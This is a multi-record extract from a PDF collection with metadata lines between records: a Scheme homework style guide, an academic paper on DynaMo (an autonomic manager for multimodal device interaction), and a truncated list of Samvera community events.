The lists of tokens passed to your various procedures often contain various **symbols**. You should process and handle these symbols without converting them into strings first. (Treating symbols as strings everywhere is bad Scheme Zen.)

You are expected to use good programming **style**, such as naming, indentation/spacing, and avoiding redundancy when possible. Avoid long lines of over 100 characters in length; if you have such a line, split it into multiple lines. Recall that DrScheme is able to auto-indent your entire program for you simply by selecting code and pressing the Tab key. In general, favor the `cons` procedure to grow lists versus the `append` procedure (though `append` is sometimes necessary and is not forbidden entirely). Favor the use of higher-order procedures such as `map` over manually iterating over / recursively processing a list.

Place a descriptive **comment** header at the top of your program along with a comment header on each procedure, including a description of the meaning of its parameters, its behavior/result, and any preconditions it assumes. If you declare a non-trivial or non-obvious inner helper procedure, also briefly comment the purpose of that helper in a similar fashion. Since the procedures in this assignment are larger and more elaborate, you should put comments within the procedures explaining the complex code, such as which grammar rule a particular part of the code is processing, etc.

**Efficiency** on a fine level of detail is not crucial on this assignment. But code that is unnecessarily computationally inefficient (such as code that performs an algorithm that should be $O(n)$ in $O(n^2 \log n)$ time) might receive a deduction. **Redundancy**, such as recomputing a value unnecessarily or unneeded recursive cases, should be avoided. This assignment involves a lot of similar but not identical code, such as checking whether a given expression matches a particular pattern, then breaking apart the list to process it based on that pattern. Intelligently utilize helper procedures to capture common code to avoid redundancy. Avoid repeating large common subexpressions as much as possible; for example, the pseudo-code "if (test) then (1 + really long expression) else (2 + really long expression)" is better written as "((if test then 1 else 2) + really long expression)".
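As a small illustration of this last point, here is the same refactoring written as real Scheme rather than pseudo-code. It is purely illustrative, the names are hypothetical, and it is not part of the required parser code:

```scheme
;; Illustrative only; these names are hypothetical and not part of the assignment.
(define (really-long-expression x)
  (* x x x))  ; stands in for some large shared subexpression

;; Redundant: the shared subexpression appears in both branches of the if.
(define (score-redundant test x)
  (if test
      (+ 1 (really-long-expression x))
      (+ 2 (really-long-expression x))))

;; Preferred: only the part that actually varies stays inside the if.
(define (score test x)
  (+ (if test 1 2)
     (really-long-expression x)))
```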
{"Source-Url": "http://courses.cs.washington.edu/courses/cse341/10au/homework/7/spec.pdf", "len_cl100k_base": 5361, "olmocr-version": "0.1.50", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 17746, "total-output-tokens": 5986, "length": "2e12", "weborganizer": {"__label__adult": 0.00046181678771972656, "__label__art_design": 0.0004944801330566406, "__label__crime_law": 0.0003681182861328125, "__label__education_jobs": 0.00958251953125, "__label__entertainment": 9.79900360107422e-05, "__label__fashion_beauty": 0.00020265579223632812, "__label__finance_business": 0.00021445751190185547, "__label__food_dining": 0.0006151199340820312, "__label__games": 0.0008392333984375, "__label__hardware": 0.0006856918334960938, "__label__health": 0.0003528594970703125, "__label__history": 0.0002290010452270508, "__label__home_hobbies": 0.00016832351684570312, "__label__industrial": 0.0004405975341796875, "__label__literature": 0.0005288124084472656, "__label__politics": 0.0002803802490234375, "__label__religion": 0.000606536865234375, "__label__science_tech": 0.004230499267578125, "__label__social_life": 0.0002267360687255859, "__label__software": 0.004337310791015625, "__label__software_dev": 0.9736328125, "__label__sports_fitness": 0.00039505958557128906, "__label__transportation": 0.0005764961242675781, "__label__travel": 0.0002366304397583008}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20495, 0.08829]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20495, 0.46794]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20495, 0.86645]], "google_gemma-3-12b-it_contains_pii": [[0, 3958, false], [3958, 6832, null], [6832, 10550, null], [10550, 13699, null], [13699, 16278, null], [16278, 20495, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3958, true], [3958, 6832, null], [6832, 10550, null], [10550, 13699, null], [13699, 16278, null], [16278, 20495, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20495, null]], "pdf_page_numbers": [[0, 3958, 1], [3958, 6832, 2], [6832, 10550, 3], [10550, 13699, 4], [13699, 16278, 5], [16278, 20495, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20495, 0.00515]]}
olmocr_science_pdfs
2024-12-03
2024-12-03
bd9ab80af0443b92a12c0bd52f153aad3acaede7
Towards Autonomic Multimodal Interaction

Pierre-Alain Avouac, Laurence Nigay, Philippe Lalanda

HAL Id: hal-00748665, https://hal.science/hal-00748665, submitted on 5 Nov 2012. HAL is a multi-disciplinary open access archive for the deposit and dissemination of scientific research documents, whether they are published or not. The documents may come from teaching and research institutions in France or abroad, or from public or private research centers.

Pierre-Alain Avouac, Grenoble University, 220 rue de la chimie, 38 000 Grenoble, France, Pierre-Alain.Avouac@imag.fr
Laurence Nigay, Grenoble University, 220 rue de la chimie, 38 000 Grenoble, France, Laurence.Nigay@imag.fr
Philippe Lalanda, Grenoble University, 220 rue de la chimie, 38 000 Grenoble, France, Philippe.Lalanda@imag.fr

ABSTRACT

The heterogeneity and dynamism of pervasive environments prevent building static multimodal interaction. In this paper, we present how we use the autonomic approach to build and maintain adaptable multimodal interaction. We describe the characteristics of this adaptation, which is realized by an autonomic manager that relies on models specified by interaction designers and developers. Finally, an example with a real application and existing devices is explained.

Categories and Subject Descriptors

H.5.2 [Information Interfaces and Presentation]: User Interfaces – input devices and strategies, interaction styles, user interface management systems (UIMS). D.2.2 [Software Engineering]: Design Tools and Techniques – User interfaces.

General Terms

Algorithms, Design.

Keywords

Multimodal interaction, autonomic computing.

1. INTRODUCTION

As envisioned by Mark Weiser [6], computers are getting more and more numerous and interconnected. Somehow, they even disappear from the awareness of users, who now tend to reason in terms of services and not in terms of computing elements. One purpose of pervasive computing indeed is to realize this vision of increasingly ubiquitous network-enabled devices. Specifically, it aims at filling our environment with communication-enabled devices in order to assist us in our daily activities.

Service-Oriented Computing (SOC) has recently emerged and has clearly fostered the domain of pervasive communication-enabled devices [4],[1]. The very purpose of this reuse-based approach is to build applications through the late composition of independent software elements, called services. Services can be implemented within smart devices. They are described and dynamically published by service providers; at runtime they are chosen and invoked by service consumers. This is achieved within a service-oriented architecture (SOA), providing the supporting mechanisms. Service orientation brings in major software qualities. It promotes weak coupling between consumers and providers, reducing dependencies among composition units. Late binding and substitutability improve adaptability. Since a service can be chosen or replaced at runtime, it is easier to improve the way requirements are met. A number of implementations have been proposed in recent years. Web Services (www.w3c.org), for instance, represent a solution of choice for software integration.
UPnP (www.upnp.org) and DPWS (Devices Profile for Web Services) are heavily used in pervasive applications in order to implement volatile devices. OSGi (www.osgi.org) and iPOJO (www.ipojo.org) provide advanced dynamic features to many software systems.

It is expected that, in the long term, devices will fade into the environment and users will not be aware of their location or their precise nature. There will be no need for complex, specific interfaces. Users will simply express their needs or desires, and the environment and the objects in it will configure themselves autonomously. In the mid term, the situation is a bit different. Interactions with smart devices are generally explicit. Users have to engage in explicit interaction with devices in order to obtain a service.

Effectively interacting with pervasive devices is complicated by several factors. First, an interaction may need several devices. It is then necessary to deal with several sources of heterogeneous data in order to trigger an action. The activity of integrating disparate information sources in a timely fashion is known under the name of mediation. Mediation has historically been used to integrate data stored in IT resources like databases, knowledge bases, file systems, digital libraries or electronic mail systems [7],[8],[3]. It is now also used to allow interoperability between heterogeneous software applications and devices [2].

Another problem is related to the number and variety of smart communication devices, which is just exploding. PDAs, smartphones, set-top boxes, cameras, and electronic appliances can be found in many houses today. As envisioned by Moore's law, these devices are getting cheaper and smaller and are pervading every aspect of our life. The problem is that this invasion is chaotic: devices use a number of communication protocols and are rarely interoperable. For instance, more than 50 candidate protocols, working groups and standard specifications for home networking already exist today (see www.caba.org for an updated list). As a consequence, building consistent interactions based on network-enabled devices that spontaneously enter and leave the network turns out to be a real challenge.

We believe that significant progress is needed along several dimensions. New architectures and techniques are actually needed in order to seamlessly integrate heterogeneous and changing devices and networks. In this paper, we present an autonomic solution to this problem of multimodal interaction in heterogeneous, dynamic domains. The paper is organized as follows. Firstly, our autonomic approach is motivated, and the adaptation characteristics of our work are described. Secondly, the models used to guide adaptation are explained. Finally, a concrete example is provided, with emphasis on the autonomic aspect and its coupling with models.

2. AUTONOMIC INTERACTION

A multimodal interface enables a user to use more than one device to interact with a system. In the pervasive vision, a user is surrounded by devices that can be seen as resources or as means to trigger an action on the environment. Input devices, like remote controllers or webcams coupled with movement recognition, allow users to express their needs and desires. Other devices, like heating systems or movie players, host applications and are actually in charge of fulfilling the users' needs. Finally, output devices inform the user of the system response: loudspeaker, screen, etc.
Our work focuses on input multimodality, that is to say on unidirectional communication from input devices to service-based devices. Due to the heterogeneity of environments, no assumption can be made about how a user will interact with an application. Thus, applications and devices are independent. However, interaction designers should be able to add some of their knowledge. Finally, a user should be able to configure some aspects of the interaction according to his or her preferences. Therefore, the interaction has to be adaptable. However, performing this adaptation requires deep technical knowledge that users and interaction designers do not have. The need for an autonomic approach emerges from this set of facts.

We have developed DynaMo (standing for "dynamic modalities"), a software system that generates and maintains context-adapted multimodal interactions. The general assumptions behind DynaMo are:

- An application is a set of tasks that consume data;
- A device is a set of sensors that provide data;
- Applications and devices are exposed as services, as defined in service-oriented computing.

Providing users with multimodal interaction facilities is a hard task where a number of requirements have to be met. A user generally has preferences that have to be considered carefully. A user does not want to deal with low-level details. For instance, he/she neither wants to notify the system that a device is no longer usable nor to create a whole interaction by hand. Also, a user may want to prevent a device from being used for some task, or give a policy in order to guide the interaction generation according to his or her preferences. Providing multimodal interaction facilities is made even harder in pervasive environments, characterized by their heterogeneity and dynamicity. More precisely, the following aspects have to be taken into account:

- The environment (which devices and services are accessible at a given point in time?);
- Information about devices and services (how do services and devices interact?);
- User preferences (which policy should an interaction follow?).

In our work, we propose to use an autonomic manager in order to generate (and maintain) an interaction. Because carrying data from input devices to services can be seen as a mediation problem, we have decided to implement an interaction through a mediation chain. In this approach, the autonomic manager thus has three kinds of input, which will be detailed hereafter, and its output is a mediation chain. The autonomic manager is reactive: when a modification occurs in the input elements, it computes a new chain or adapts the current one.

Figure 1. Global approach

In order to better understand the adaptations that have to be made by the autonomic manager, we present here the objects to adapt, the realization issues, the temporal characteristics and the interaction concerns, as suggested in [5].

The object to adapt is a mediation chain that is made of specific elements called mediators. Adaptations are done globally, at the chain level. The impact is low from the system's point of view: because the mediation chain is in a well-defined place in the architecture, there is no side effect elsewhere. The mediation chain is decoupled from the autonomic manager. The device and application are not aware of the mediation chain, so they do not see any change. Currently, the time cost is not negligible from the user's point of view (about 3 seconds). It should become nearly negligible once the responsible low-level anomaly is spotted: less than one second is the target.
The impact on the user can be huge: a new interaction takes place, and the old interaction is no longer available. Of course, the adaptation is done in order to enhance the user's communicative capabilities: a new interaction is built because new communication possibilities exist. In conclusion, the adaptation is strong because a part of the architecture is modified.

The realization issue is split into approach and type. The decision-making is static: a user can choose a policy at runtime, but he/she cannot modify the effect of a rule without recompiling. The same holds for the models used to generate an interaction: models can be modified at runtime, but the decision-making that relies on these models cannot be changed at runtime. These statements have to be tempered: DynaMo itself is built with the dynamic service approach, so in theory the decision processes could be changed at runtime, but that has not been investigated. The adaptation is external: the adaptable mediation chain is decoupled from the autonomic manager. This separation eases the evolution of the mediation chain on the one hand, and the evolution of the autonomic manager on the other. The adaptation is realized without learning from the user's inputs. However, several cases would obviously benefit from learning. For example, if a button is never used by a user, DynaMo could propose to bind this button to another function. Use of an autonomic architecture will ease the machine learning process because sensing and effecting are already in place. The adaptation is model-based: descriptions of devices and applications reside in models. These models have to conform to a meta-model that is specific to the interaction domain.

The temporal characteristics are split into reactive/proactive adaptation and continuous/adaptive monitoring. The adaptation is reactive: a change in the environment potentially triggers the generation of a new interaction. The same occurs for rules: if the user chooses another rule, a new interaction is generated. No assumption can be made about the evolution of the environment. Hence, the monitoring is continuous.

Finally, interaction concerns are split into human involvement, trust and interoperability. The user is involved when he/she chooses a policy rule. Moreover, the user can choose which application she or he wants to control through the multimodal interaction. By contrast, changes in the set of accessible devices do not require the user's involvement. Trust is obtained in different ways. First, the algorithms used are deterministic: if the autonomic manager's inputs are the same, the provided mediation chain is the same. Then, the appearance and disappearance of services and devices are notified to the user. Finally, a simple mechanism ensures that if a button has a validation function, it will be used for validation, whatever the application deals with. The main shortcoming concerns the observability of an interaction by the user. Currently, a user cannot easily know what task is bound to a sensor. Some work is being done to improve this.

Throughout this presentation, we have underscored some advantages of our modeling approach. The next section presents the models that can be specified by the stakeholders.

3. MODELS

The autonomic manager needs some information to generate a useful interaction. We have decided to store most of the necessary information in models. Two kinds of models are handled: proxy models and interaction models. This separation has been done in order to target the two different stakeholders: developers and interaction designers.
A developer is in charge of developing both device and application proxies. She/he has to provide one model for each proxy. A proxy model contains information about the discovery process that is used by the discovery manager. From this information, the discovery manager is able to track the concerned device or application and start its corresponding proxy. The model contains other information about how to send data to a proxy or receive data from a proxy, especially the data type. From this information, the autonomic manager can connect the endpoints of a mediation chain to the proxies. If a data type is a number (float or integer), the interval has to be provided. An interval is composed of a lower bound and an upper bound. This information enables the autonomic manager to adapt intervals at runtime by inserting an adaptor between incompatible intervals. For example, if a device provides numbers in the interval $[-100, +100]$ and a connected application task handles numbers in the interval $[0, +100]$, the inserted adaptor performs a linear transformation of each value between these two intervals (a small illustrative sketch appears below). Figure 2 shows the meta-model that proxy models are expected to conform to.

An interaction designer is an expert: she/he is able to determine the best way to interact with an application or the best way a device can be used. She/he may provide one or several interaction models for each proxy model. Because these models depend on only one proxy, they describe only a partial interaction that is completed by the autonomic manager, which generates a full interaction at runtime. Interaction models contain information about data semantics, data processing and data paths.

Without knowing the semantics of a data item, the autonomic manager is only able to reason about its type. That is enough to prevent it from generating a broken interaction caused by incompatible data types. Guided by semantics, however, the autonomic manager is able to generate a more useful interaction. Data processing is important: the interaction designer is able to enhance an interaction by adding tasks to an application, synchronizing data, and so on. For example, if a media player application proposes a task to control the sound volume through a number, then the interaction designer can add a task that mutes the volume. A data path is the succession of functions that a data item will pass through. Figure 3 shows a detail of the general meta-model concerning partial interactions.

Freely defining semantics does not make sense because the autonomic manager needs to match defined meanings across the different interaction models. Several interaction classes have been predefined. An interaction class defines several meanings that make sense together. An interaction model references one interaction class, so only the meanings of this class can be attached to the data of this model. In order to ease the definition of data processing, a predefined library of processing functions is provided. The interaction designer declares which function has to be used, and provides a configuration for the function. For example, a triggering function sends an event as soon as it receives a value greater than a configured ceiling. These functions are specific to the interaction domain. They have been tailored with reuse concerns in mind. The functions are implemented by components. Thus, the interaction designer specifies a partial interaction by declaring which base components to use, configuring them, and binding their ports together.
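As an illustration of the interval adaptation mentioned above, here is a minimal, hypothetical sketch in Java; the class and method names are ours and are not part of DynaMo's actual API. It simply rescales values linearly from the device's declared interval into the interval expected by the application task, which is the behavior the inserted adaptor mediator provides.

```java
/**
 * Hypothetical sketch (not DynaMo's API) of an interval adaptor:
 * values from a source interval are rescaled linearly into a target
 * interval before being delivered to the application task.
 */
public final class IntervalAdaptor {
    private final double srcLow, srcHigh, dstLow, dstHigh;

    public IntervalAdaptor(double srcLow, double srcHigh,
                           double dstLow, double dstHigh) {
        this.srcLow = srcLow;    // e.g. device range [-100, +100]
        this.srcHigh = srcHigh;
        this.dstLow = dstLow;    // e.g. task range [0, +100]
        this.dstHigh = dstHigh;
    }

    /** Linear transformation applied to every value passing through. */
    public double adapt(double value) {
        double ratio = (value - srcLow) / (srcHigh - srcLow);
        return dstLow + ratio * (dstHigh - dstLow);
    }

    public static void main(String[] args) {
        IntervalAdaptor a = new IntervalAdaptor(-100, 100, 0, 100);
        System.out.println(a.adapt(-100)); // 0.0
        System.out.println(a.adapt(0));    // 50.0
        System.out.println(a.adapt(100));  // 100.0
    }
}
```

In DynaMo, such an adaptor would be inserted automatically by the autonomic manager whenever the declared intervals of two connected ports are incompatible.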
At this stage of specification, data types can generally be ignored because the autonomic manager is able, at runtime, to infer the data type of each port. This inference completes the component configuration and adds data-type-converting components if necessary. Specifying a partial interaction by assembling and configuring several domain-specialized components eases the interaction designer's work. This approach maximizes reusability by providing generic components, lowers the difficulty by hiding implementation details, and facilitates the implementation of the autonomic manager because the abstraction gap between components and mediators is narrow.

Figure 4. General meta-model used by the autonomic manager

These models conform, through instantiation, to their corresponding meta-models. The autonomic manager relies on a general meta-model that integrates these two meta-models. Figure 4 shows an excerpt of this general meta-model, notably the relations between proxies, partial interactions and the component library. We have presented the two main meta-models used by DynaMo. The next section provides examples of some model specifications.

4. EXAMPLE

The following example shows how the autonomic manager deals with two devices and one application. The application is a media player, namely VLC (official website: http://www.videolan.org/vlc/). The first device is a Blu-ray remote control, namely the BD Remote Control (or BDRC). The second device is a controller for a video game console, namely the Wii Remote (or Wiimote). VLC can receive commands through an inter-process communication system, namely D-Bus. The two devices use the Bluetooth protocol (official website: http://www.bluetooth.com/) to send data. Figure 5 shows the proxy models. Only excerpts of the actual proxy and interaction models are shown: the VLC proxy model also has stop, next and previous tasks, etc.

From the autonomic manager's point of view, it receives a discovery notification about VLC, hence it downloads the VLC binary proxy from the repository and starts it. Since no device has been discovered, no mediation chain is generated. Then, it receives a discovery notification about the BDRC. It starts the BDRC proxy. Now, a mediation chain can be generated. Among the interaction models of the BDRC and VLC, it selects the two that have the same interaction class. It instantiates the components declared in the interaction models, and binds the mediators of each interaction if their meanings match. When Alice pushes the pause button, a data item is sent by the BDRC. The proxy gets the data and passes an event to a mediator. In this mediator, we could possibly notify the autonomic manager that the button has been used. The event follows a path through the mediation chain and arrives at the pause port of the VLC proxy. The proxy calls the pause task on VLC.

As soon as the autonomic manager is notified of the Wiimote discovery, it starts the proxy. No interaction class of VLC and the Wiimote matches. The autonomic manager generates the same mediation chain plus a part that connects the Wiimote proxy to the VLC proxy. This new part is created only from information about data types. Finally, when the BDRC runs out of energy, the autonomic manager is notified and generates the same mediation chain without the BDRC part. Excerpts of the partial interaction models are shown in Figure 6. The matching interaction class is "MediaPlayer". Its meaning set contains "pause" and "mute".
Since only components can be declared in the interaction models, attaching a meaning is done by declaring an "identity" component and attaching a meaning to a port of that component. Since the same meanings are employed in each model, the autonomic manager is able to bind these ports directly. The generated mediation chain is shown in Figure 7. The identity components declared in the interaction models are not apparent in the mediation chain: since an "identity" component does not modify the data that pass through it, they are removed at the end of the generation process. The Wiimote proxy model does not have an interaction model that uses the "MediaPlayer" interaction class. This lack of information results in random bindings between Wiimote proxy ports and VLC ports. Of course, the autonomic manager verifies data type compatibility. Moreover, it distributes the bindings among application tasks, to prevent a single task from being bound to all sensors.

5. Conclusion

In this paper, we have shown how we leverage autonomic computing principles to build context-adaptable multimodal interactions. The heterogeneity and dynamicity of pervasive environments are handled. We have created DynaMo, a software system that generates and maintains interactions. Generation and maintenance are realized by an autonomic manager, which reasons with models. At design time, these models are specified by developers or interaction designers, according to their knowledge. At runtime, a user is able to choose a policy that guides interaction building towards his or her preferences. An example with two existing devices and a real application has been explained. Our overall architecture already makes it possible to adapt an interaction to the context. Some interesting work remains that should fit easily into this architecture. For example, collecting data inside a mediation chain should enable DynaMo to analyze the user's usage of interactions, in order to propose new adaptations to the user.

6. REFERENCES
{"Source-Url": "https://hal.science/hal-00748665/file/Avouac-Nigay-Lalanda_MAASC2011.pdf", "len_cl100k_base": 4454, "olmocr-version": "0.1.53", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 20757, "total-output-tokens": 5351, "length": "2e12", "weborganizer": {"__label__adult": 0.00035381317138671875, "__label__art_design": 0.00112152099609375, "__label__crime_law": 0.0003304481506347656, "__label__education_jobs": 0.0006556510925292969, "__label__entertainment": 0.00014102458953857422, "__label__fashion_beauty": 0.0001957416534423828, "__label__finance_business": 0.00020420551300048828, "__label__food_dining": 0.000385284423828125, "__label__games": 0.0005636215209960938, "__label__hardware": 0.0020542144775390625, "__label__health": 0.0006074905395507812, "__label__history": 0.00034618377685546875, "__label__home_hobbies": 9.244680404663086e-05, "__label__industrial": 0.0004150867462158203, "__label__literature": 0.00040030479431152344, "__label__politics": 0.00027823448181152344, "__label__religion": 0.000568389892578125, "__label__science_tech": 0.11761474609375, "__label__social_life": 9.644031524658204e-05, "__label__software": 0.0167236328125, "__label__software_dev": 0.85595703125, "__label__sports_fitness": 0.0002715587615966797, "__label__transportation": 0.0005736351013183594, "__label__travel": 0.0002363920211791992}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 24645, 0.0365]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 24645, 0.55249]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 24645, 0.91417]], "google_gemma-3-12b-it_contains_pii": [[0, 1004, false], [1004, 6125, null], [6125, 11758, null], [11758, 17349, null], [17349, 21148, null], [21148, 24645, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1004, true], [1004, 6125, null], [6125, 11758, null], [11758, 17349, null], [17349, 21148, null], [21148, 24645, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 24645, null]], "pdf_page_numbers": [[0, 1004, 1], [1004, 6125, 2], [6125, 11758, 3], [11758, 17349, 4], [17349, 21148, 5], [21148, 24645, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 24645, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
bd24ba81813fca524faaf17cb39af59dce15cadd
[REMOVED]
{"Source-Url": "http://www.researchgate.net/profile/Michal_Chromiak/publication/262411400_The_linkup_data_structure_for_heterogeneous_data_integration_platform/links/0c960538ca4ea39934000000.pdf", "len_cl100k_base": 5250, "olmocr-version": "0.1.42", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 28607, "total-output-tokens": 6893, "length": "2e12", "weborganizer": {"__label__adult": 0.00033402442932128906, "__label__art_design": 0.0006809234619140625, "__label__crime_law": 0.00048422813415527344, "__label__education_jobs": 0.0013065338134765625, "__label__entertainment": 9.644031524658204e-05, "__label__fashion_beauty": 0.00018274784088134768, "__label__finance_business": 0.0006132125854492188, "__label__food_dining": 0.0004088878631591797, "__label__games": 0.0004198551177978515, "__label__hardware": 0.0015583038330078125, "__label__health": 0.0010023117065429688, "__label__history": 0.0004489421844482422, "__label__home_hobbies": 0.00012540817260742188, "__label__industrial": 0.0007600784301757812, "__label__literature": 0.0003795623779296875, "__label__politics": 0.00028705596923828125, "__label__religion": 0.0005474090576171875, "__label__science_tech": 0.26708984375, "__label__social_life": 0.00012063980102539062, "__label__software": 0.02978515625, "__label__software_dev": 0.6923828125, "__label__sports_fitness": 0.0002193450927734375, "__label__transportation": 0.0005497932434082031, "__label__travel": 0.0002275705337524414}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 29624, 0.02991]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 29624, 0.42241]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 29624, 0.91511]], "google_gemma-3-12b-it_contains_pii": [[0, 2547, false], [2547, 5863, null], [5863, 8986, null], [8986, 12363, null], [12363, 15881, null], [15881, 16987, null], [16987, 19337, null], [19337, 21174, null], [21174, 23071, null], [23071, 24594, null], [24594, 27164, null], [27164, 29624, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2547, true], [2547, 5863, null], [5863, 8986, null], [8986, 12363, null], [12363, 15881, null], [15881, 16987, null], [16987, 19337, null], [19337, 21174, null], [21174, 23071, null], [23071, 24594, null], [24594, 27164, null], [27164, 29624, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 29624, null]], "pdf_page_numbers": [[0, 2547, 1], [2547, 5863, 2], [5863, 8986, 3], [8986, 12363, 4], [12363, 15881, 5], [15881, 16987, 6], [16987, 19337, 7], [19337, 21174, 8], [21174, 23071, 9], [23071, 24594, 10], [24594, 27164, 11], [27164, 29624, 12]], 
"pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 29624, 0.0]]}
olmocr_science_pdfs
2024-11-22
2024-11-22
3b24ef746ed528281a06e1f3c3c0b36a21fa9f86
Events, presentations and articles For Partner meetings agendas and notes, see Samvera Partner Meetings. For the full Samvera Meetings and Events Diary, see the Samvera Events Calendar. See also Related Conferences for a list of other conferences taking place where a Samvera presence might be desirable (and/or to avoid scheduling conflicts).
- Forthcoming Events
- Past events (with presentations if available)
- Related Conferences

Forthcoming Events
One or more members of the Samvera Community will be attending the following events. Events listed with the Samvera icon are organised by or on behalf of Samvera; those labelled with the Hydra icon were organised by or on behalf of Hydra (our previous name).
- Samvera Virtual Connect 2020 14-15 May 2020 | Online
- PASIG Postponed to 22-24 September 2020 | Biblioteca Digital Memoria de Madrid, Spain
- Open Repositories 2020 Postponed to 2021 | Stellenbosch University, South Africa
- Hyrax & Hyku User Workshop 6-7 August 2020 | Notch8, San Diego, CA
- Intro Samvera Camp 29 September - 2 October 2020 | San Diego
- Samvera Developer Congress 16 - 18 November 2020 | Virtual | Now virtual and moved to November due to the COVID-19 disruption
- Samvera Partner meeting 26 October 2020 | UC Santa Barbara Library | CANCELLED due to the COVID-19 disruption; arrangements will be made to replace this with a virtual meeting
- Samvera Connect 2020 27 - 30 October 2020 | Hilton Santa Barbara Beachfront Resort, Santa Barbara, CA | CANCELLED due to the COVID-19 disruption; arrangements will be made to replace this with a virtual meeting
- Open Repositories 2021 31 May - 3 June 2021 | Stellenbosch University, South Africa

--- Past events (with presentations if available) **Samvera Partner meeting** 27-28 April 2020 | On-line **Introductory Samvera Camp** 14-17 April 2020 | University of North Carolina at Chapel Hill CANCELLED due to COVID-19 emergency **Code4Lib 2020** 8-11 March 2020 | Westin Hotel, Pittsburgh **Solar Vortex - Samvera Developer Congress** 22-24 January 2020 | UC San Diego **CNI Fall 2019 Membership Meeting** 9-10 December 2019 | Omni Shoreham Hotel Washington, DC **Samvera Connect 2019** 22-25 October 2019 | Washington University in St Louis, MO **Samvera Developer Congress** 21 October 2019 | Washington University in St Louis **Samvera Partner meeting** 21 October 2019 | Washington University in St Louis **2019 DLF Forum** 13-17 October 2019 | Tampa, Florida **Samvera European Regional Group** Notch8 Hyrax and Hyku User Workshop 26-27 September | San Diego, CA Linked Data working meeting 24-27 September | Stanford University Libraries Samvera Camp (introductory) 9-12 September 2019 | UCLA 2019 IIIF Conference 24-28 June 2019 | Göttingen, Germany Open Repositories 2019 10-13 June 2019 | Universität Hamburg, Hamburg, Germany Samvera West Coast Regional Meeting 23 May | UC San Diego Samvera Partner meeting 29-30 April 2019 | IUPUI, Indianapolis Samvera Virtual Connect 2019 23-24 April 2019 | Online Samvera European Regional Group 28 March 2019 | University of Oxford LDCX Invitation only 25-27 March 2019 | Stanford University Samvera European Regional Group 13 December 2018 | Senate House, University of London CNI Fall 2018 Membership meeting 10-11 December 2018 | Washington DC 2018 DLF Forum 14-18 October 2018 | Las Vegas Samvera Connect 2018 9-12 October 2018 | University of Utah, Salt Lake City Samvera Partner meeting 8 October 2018 | University of 